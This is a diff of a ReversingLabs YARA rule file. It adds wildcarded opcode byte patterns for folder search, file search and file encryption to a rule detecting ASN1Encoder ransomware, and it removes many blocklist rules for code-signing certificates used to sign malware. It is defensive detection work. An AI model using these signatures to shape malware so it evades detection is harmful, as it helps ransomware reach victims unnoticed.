?? B8 ?? ?? + ?? ?? 55 57 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 F6 0F 88 ?? ?? ?? ?? 74 + ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 56 50 8B D0 E8 ?? ?? ?? ?? 55 57 56 BA ?? ?? ?? ?? + 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 88 ?? ?? ?? ?? 99 03 F8 13 EA E9 ?? ?? + ?? ?? 6A ?? 58 89 1D ?? ?? ?? ?? 83 E8 ?? 75 ?? 8B C7 89 1D ?? ?? ?? ?? 0B C5 BE ?? + ?? ?? ?? 74 ?? 51 8D 54 24 ?? E8 ?? ?? ?? ?? 59 B9 ?? ?? ?? ?? 3B F1 74 ?? 56 51 BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 55 57 BD ?? ?? ?? ?? 8B D1 55 8D 4C 24 ?? E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 0F 88 ?? ?? ?? ?? EB ?? BD ?? ?? ?? ?? 6A ?? 59 8B C1 BA ?? + ?? ?? ?? C6 02 ?? 42 83 E8 ?? 75 ?? B8 ?? ?? ?? ?? C6 00 ?? 40 83 E9 ?? 75 ?? 6A ?? + 58 B9 ?? ?? ?? ?? C6 01 ?? 41 83 E8 ?? 75 ?? C6 06 ?? 46 83 ED ?? 75 ?? 6A ?? 8D 44 + 24 ?? 59 C6 00 ?? 40 83 E9 ?? 75 ?? B1 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? + ?? ?? 8B C3 30 4C 04 ?? 40 83 F8 ?? 73 ?? 8A 4C 24 ?? EB ?? 8B 4C 24 ?? 8D 54 24 ?? + 88 5C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 8B F0 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B D6 E8 ?? + ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 33 DB 43 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B C3 EB ?? 8D 4C + 24 ?? E8 ?? ?? ?? ?? 33 C0 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 + } + $encrypt_files_p3 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 55 56 57 6A ?? 5E 56 BF ?? ?? ?? ?? 57 FF 15 + ?? ?? ?? ?? 51 BB ?? ?? ?? ?? BD ?? ?? ?? ?? 8B D3 8B CD E8 ?? ?? ?? ?? 59 56 57 FF + 15 ?? ?? ?? ?? 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C6 C6 07 ?? 47 + 83 E8 ?? 75 ?? BF ?? ?? ?? ?? BA ?? ?? ?? ?? 53 8B CF E8 ?? ?? ?? ?? 59 6A ?? 58 C6 + 03 ?? 43 83 E8 ?? 75 ?? B9 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 3B E9 74 ?? 55 51 8B D6 + E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3B C1 74 ?? 50 51 8B D6 E8 ?? + ?? ?? ?? 83 C4 ?? 6A ?? 5B 53 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? B9 ?? ?? + ?? ?? 50 51 8B D3 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 3B C8 74 ?? + 51 50 6A ?? 5A 8B C8 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B C1 74 + ?? 50 51 8B D6 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3B C1 74 ?? 50 + 51 6A ?? 5A E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6A ?? 5B 3B C1 74 + ?? 50 51 8B D3 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B C1 74 ?? 50 + 51 6A ?? 5A E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 8B D7 50 8D 4C 24 ?? E8 ?? ?? ?? ?? + 59 BA ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 59 59 83 64 24 ?? ?? 83 EB ?? + 75 ?? 21 9C 24 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 59 C6 00 ?? 40 83 E9 ?? 75 ?? 8B C6 C6 + 45 ?? ?? 45 83 E8 ?? 75 ?? C6 07 ?? 47 83 EE ?? 75 ?? 33 C0 5F 40 5E 5D 5B 8B E5 5D + C3 + } + $find_files_p1 = { + 55 8B EC 83 EC ?? 53 56 6A ?? 59 E8 ?? ?? ?? ?? 8B F0 66 C7 45 ?? ?? ?? 33 DB 89 35 + ?? ?? ?? ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? + ?? 66 C7 45 ?? ?? ?? 02 C8 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8D 45 ?? 88 + 5D ?? 50 8D 55 ?? 8B CE E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? B0 ?? 59 B1 ?? 88 5D ?? + 32 C1 88 4D ?? 88 45 ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + 66 C7 45 ?? ?? ?? 88 5D ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? + 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 + C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 80 44 + 05 ?? ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 + 6A ?? 33 C9 C7 45 ?? ?? ?? ?? ?? 5B B0 ?? 88 5D ?? 32 C3 88 4D ?? 88 45 ?? 8B C1 C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 88 4D ?? 80 44 05 ?? ?? 40 83 F8 ?? 72 ?? 8B + 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 6A ?? 88 5D ?? B2 ?? 66 C7 45 + ?? ?? ?? 33 C9 66 C7 45 ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 5B 8D + 04 0A 30 44 0D ?? 41 3B CB 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 + ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 6A ?? 33 C9 C6 45 ?? ?? 58 34 ?? 88 4D ?? 88 45 + } + $find_files_p2 = { + B2 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8D 04 0A 30 44 0D + ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? C6 45 ?? + ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 80 F3 ?? C6 45 ?? ?? 88 5D ?? 8D 55 ?? + 33 DB C6 45 ?? ?? 50 88 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 59 59 6A ?? 58 34 ?? C6 45 ?? ?? 88 45 ?? B2 ?? 88 5D ?? 8B CB C7 45 ?? ?? ?? ?? + ?? 66 C7 45 ?? ?? ?? 88 5D ?? 8D 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? + 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? + 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 80 44 05 ?? ?? + 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? B0 ?? C6 45 + ?? ?? 34 ?? 88 5D ?? 59 88 45 ?? B1 ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A + 4D ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 0F 28 05 + ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? 88 5D ?? 8A + 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? + E8 ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3 + } + $find_folders = { + 55 8B EC 83 EC ?? 53 56 6A ?? 59 E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 33 DB 8B F0 66 + C7 45 ?? ?? ?? 89 35 ?? ?? ?? ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8D 45 ?? + 88 5D ?? 50 8D 55 ?? 8B CE E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? B0 ?? 59 B1 ?? 88 5D + ?? 32 C1 88 4D ?? 88 45 ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? 66 C7 45 ?? ?? ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 + ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 C7 45 + ?? ?? ?? ?? ?? 88 45 ?? B2 ?? C7 45 ?? ?? ?? ?? ?? 8B CB 66 C7 45 ?? ?? ?? 88 5D ?? + 8D 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 + 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 C7 45 ?? ?? + ?? ?? ?? 88 45 ?? 8B C3 C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 80 44 05 ?? + ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 66 C7 + 45 ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 80 44 + 05 ?? ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 + 66 C7 45 ?? ?? ?? B1 ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? 66 C7 45 ?? ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8B 0D ?? ?? + ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? B2 ?? C7 45 + ?? ?? ?? ?? ?? 8B CB C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8D + 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D + 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Silvo LLC" and pe.signatures[i].serial=="56:d5:76:a0:62:49:1e:a0:a5:87:7c:ed:41:82:03:a1" and 1596249885<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_folders and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0Fcba260Df7Da602Ecf4D4D6Fc89D5Dd : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Asn1Encoder : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects ASN1Encoder ransomware." author = "ReversingLabs" - id = "ce248602-1f28-5707-b921-640271176e7f" - date = "2023-11-08" - modified = "2023-11-08" + id = "5fa361e5-4ab0-5856-92b2-6f434e33c350" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4574-L4590" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4e9a3e516342820248ebf9b3605b8ce2dbf1d9b4255a5b74f7369dd2f1cdd9d8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.ASN1Encoder.yara#L1-L136" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "000fd846fa5f09af19ead4623bb5a8eb51cdb4c751013569bf070710d3e0d61d" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "ASN1Encoder" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Gold Stroy SP Z O O" and pe.signatures[i].serial=="0f:cb:a2:60:df:7d:a6:02:ec:f4:d4:d6:fc:89:d5:dd" and 1593388801<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4152169F22454Ed604D03555B7Afb175 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "e8975a1a-ac7c-5016-a206-de9ca7eea37f" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4592-L4608" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fbb2124b934c270739f564317526d5b23b996364372426485d7c994a83293866" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SMACKTECH SOFTWARE LIMITED" and pe.signatures[i].serial=="41:52:16:9f:22:45:4e:d6:04:d0:35:55:b7:af:b1:75" and 1595808000<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_01C88Ccbd219500139D1Af138A9E898E : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "e3bd6be6-461c-56fd-8dfd-8205845f731e" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4610-L4626" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d1acb0a7d6e20158797e77c066be42548cee9293fa94f24f936a95977ac16d91" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Raymond Yanagita" and pe.signatures[i].serial=="01:c8:8c:cb:d2:19:50:01:39:d1:af:13:8a:9e:89:8e" and 1593041280<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_41D05676E0D31908Be4Dead3486Aeae3 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "bca4533d-e721-5f23-984a-3b741ca8b53f" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4628-L4644" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c4905f02c74df6d05b3f9a6fe2c4f5f32a02bb10da4db929314be043be76d703" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rov SP Z O O" and pe.signatures[i].serial=="41:d0:56:76:e0:d3:19:08:be:4d:ea:d3:48:6a:ea:e3" and 1594857600<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_8Cff807Edaf368A60E4106906D8Df319 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "c964a540-6124-52f0-b17f-692cd4b9b3af" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4646-L4664" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6fc98519faf218d90bb4e01821e6014e009c0b525cfd3c906a64ef82bc20beda" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KRAFT BOKS OOO" and (pe.signatures[i].serial=="00:8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" or pe.signatures[i].serial=="8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19") and 1598334455<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_A3E62Be1572293Ad618F58A8Aa32857F : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "2f67abf3-390a-5c67-afed-e586e20692af" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4666-L4684" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f849898465bc651f19f6f1b54315c061466d8c5860ecf1a07f54c8c8292f6a95" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ISIDA, TOV" and (pe.signatures[i].serial=="00:a3:e6:2b:e1:57:22:93:ad:61:8f:58:a8:aa:32:85:7f" or pe.signatures[i].serial=="a3:e6:2b:e1:57:22:93:ad:61:8f:58:a8:aa:32:85:7f") and 1596585600<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_672D4428450Afcc24Fc60969A5063A3E : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "fcd8e808-dbd6-5903-868a-0aa4541e6321" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4686-L4702" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8f5927e96109184bad7de4513994fd1021fe1cc5977e60fa72d808df95cb4516" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MEP, OOO" and pe.signatures[i].serial=="67:2d:44:28:45:0a:fc:c2:4f:c6:09:69:a5:06:3a:3e" and 1597381260<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Df479E14A70C7970A4De3Dd3E4Bb0318 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "465fc41c-920d-55e6-8616-a51d1f77b158" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4704-L4722" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "35b1f04cf5d5d1d89db537bf75737e3af5945e594f4d4231e9ae3e7fba52fc0d" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SOFTWARE HUB IT LTD" and (pe.signatures[i].serial=="00:df:47:9e:14:a7:0c:79:70:a4:de:3d:d3:e4:bb:03:18" or pe.signatures[i].serial=="df:47:9e:14:a7:0c:79:70:a4:de:3d:d3:e4:bb:03:18") and 1591660800<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_2924785Fd7990B2D510675176Dae2Bed : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "6898e95c-ee31-57a3-b764-99bf9008d0fe" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4724-L4740" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e308ca5f24ed5811e947289caf9aa820a16b08ea183c7aa9826f8a726fb5c3cf" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Neoopt LLC" and pe.signatures[i].serial=="29:24:78:5f:d7:99:0b:2d:51:06:75:17:6d:ae:2b:ed" and 1595000258<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_F4D2Def53Bccb0Dd2B7D54E4853A2Fc5 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "3c1bec34-9eac-5c7c-bb36-2e24b6ee52dc" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4742-L4760" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9991f44b8e984bd79269c44999481258d94bec9c21b154b63c6c30ae52344b3c" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PETROYL GROUP, TOV" and (pe.signatures[i].serial=="00:f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" or pe.signatures[i].serial=="f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5") and 1598347687<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_03Bf9Ef4Cf037A2385649026C3Da9D3E : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "d7396af1-2eae-594a-9933-3d148503c0ea" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4762-L4778" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "14196bad586b1349e6e8a1eb5621ce0d8d346ff8021c8ef80804de1533fd40d9" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "COLLECTIVE SOFTWARE INC." and pe.signatures[i].serial=="03:bf:9e:f4:cf:03:7a:23:85:64:90:26:c3:da:9d:3e" and 1595371955<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_790177A54209D55560A55Db97C5900D6 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "cc49f477-269a-55af-8344-39d2f24c1e7f" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4780-L4796" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "07c8e21fe604b481beebae784eb49e32bebee70e749581a55313bfbc757752e2" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MAK GmbH" and pe.signatures[i].serial=="79:01:77:a5:42:09:d5:55:60:a5:5d:b9:7c:59:00:d6" and 1594080000<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_048F7B5F67D8E2B3030F75Eb7Be2713D : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "e746516a-c51f-5cb8-8157-a5fe1f2c7abe" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4798-L4814" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6d1b47f3c9d7b90a5470f83a848adeebff2cf9341a1eb41ca8b45d08b469b17f" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RITEIL SERVIS, OOO" and pe.signatures[i].serial=="04:8f:7b:5f:67:d8:e2:b3:03:0f:75:eb:7b:e2:71:3d" and 1591142400<=pe.signatures[i].not_after) -} -import "pe" - -rule 